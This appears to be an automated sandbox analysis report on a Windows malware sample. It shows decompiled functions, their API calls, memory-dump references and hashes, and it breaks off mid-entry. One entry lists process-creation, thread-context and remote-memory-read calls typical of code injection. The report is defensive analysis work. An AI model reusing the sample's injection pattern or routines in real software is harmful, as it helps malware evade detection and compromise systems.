Function 703C3034, Relevance: 6.6, APIs: 4, Instructions: 564processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 703C339B
GetThreadContext.KERNELBASE(?,00010007), ref: 703C33BE
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 703C33E2

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 7118c54b34ab512dc5d918d8de1f6618fdd7aa42caeacd27443f13a0f96860cb
Instruction ID: a6196fabe8d1ea90fca7c602373daba6f680760c5b65301085c4aec816228275
Opcode Fuzzy Hash: 7118c54b34ab512dc5d918d8de1f6618fdd7aa42caeacd27443f13a0f96860cb
Instruction Fuzzy Hash: 8A321631E40208AEEB11CBA4DC45BEEB7B9BF04700F20409AE619FA2E0D7759E95DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,74B5FA90,?,74B5F560,00405A35,?,74B5FA90,74B5F560,00000000), ref: 00405C8C
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-501415292
Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E

Uniqueness

Uniqueness Score: -1.00%

Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x004031bb
0x004031c4
0x004031cd
0x004031d1
0x004031dc
0x004031dc
0x004031e4
0x004031eb
0x004031fd
0x00403204
0x004032a9
0x004032a9
0x00000000
0x0040320a
0x0040320d
0x00403219
0x0040321d
0x004032b7
0x004032b7
0x00403223
0x00403226
0x00403285
0x0040328b
0x0040328d
0x0040328d
0x0040329f
0x004032a7
0x004032ae
0x004032b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00403228
0x0040322b
0x00000000
0x00403231
0x00403236
0x0040323d
0x00403240
0x00403242
0x00403242
0x0040324f
0x00403259
0x00000000
0x00000000
0x00403262
0x00403269
0x00403281
0x004032ab
0x004032ab
0x0040326b
0x0040326b
0x0040326e
0x00403271
0x00403277
0x0040327d
0x00000000
0x0040327f
0x00000000
0x0040327f
0x0040327d
0x00000000
0x00403269
0x00000000
0x00403236
0x0040322b
0x00403226
0x0040321d
0x00403204
0x004032b9
0x004032bc

APIs

SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x0040665e
0x00406661
0x00406668
0x00406670
0x0040667c
0x00000000
0x00406683
0x00406673
0x0040667a
0x00000000
0x0040668b
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
GetProcAddress.KERNEL32(00000000,?), ref: 00406683

Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D

Uniqueness

Uniqueness Score: -1.00%

Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dea
0x00405df7
0x00405e0c
0x00405e12

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\lpdKSOB78u.exe,80000000,00000003), ref: 00405DEA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405dc6
0x00405dcc
0x00405dd1
0x00405dda
0x00405dda
0x00405de3

APIs

GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98

Uniqueness

Uniqueness Score: -1.00%

Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004058bd
0x004058c5
0x00000000
0x004058cb
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e62
0x00405e72
0x00405e7a
0x00000000
0x00405e81
0x00000000
0x00405e83

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e91
0x00405ea1
0x00405ea9
0x00000000
0x00405eb0
0x00000000
0x00405eb2

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00415F40,00415460,004033BF,00415460,00415F40,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
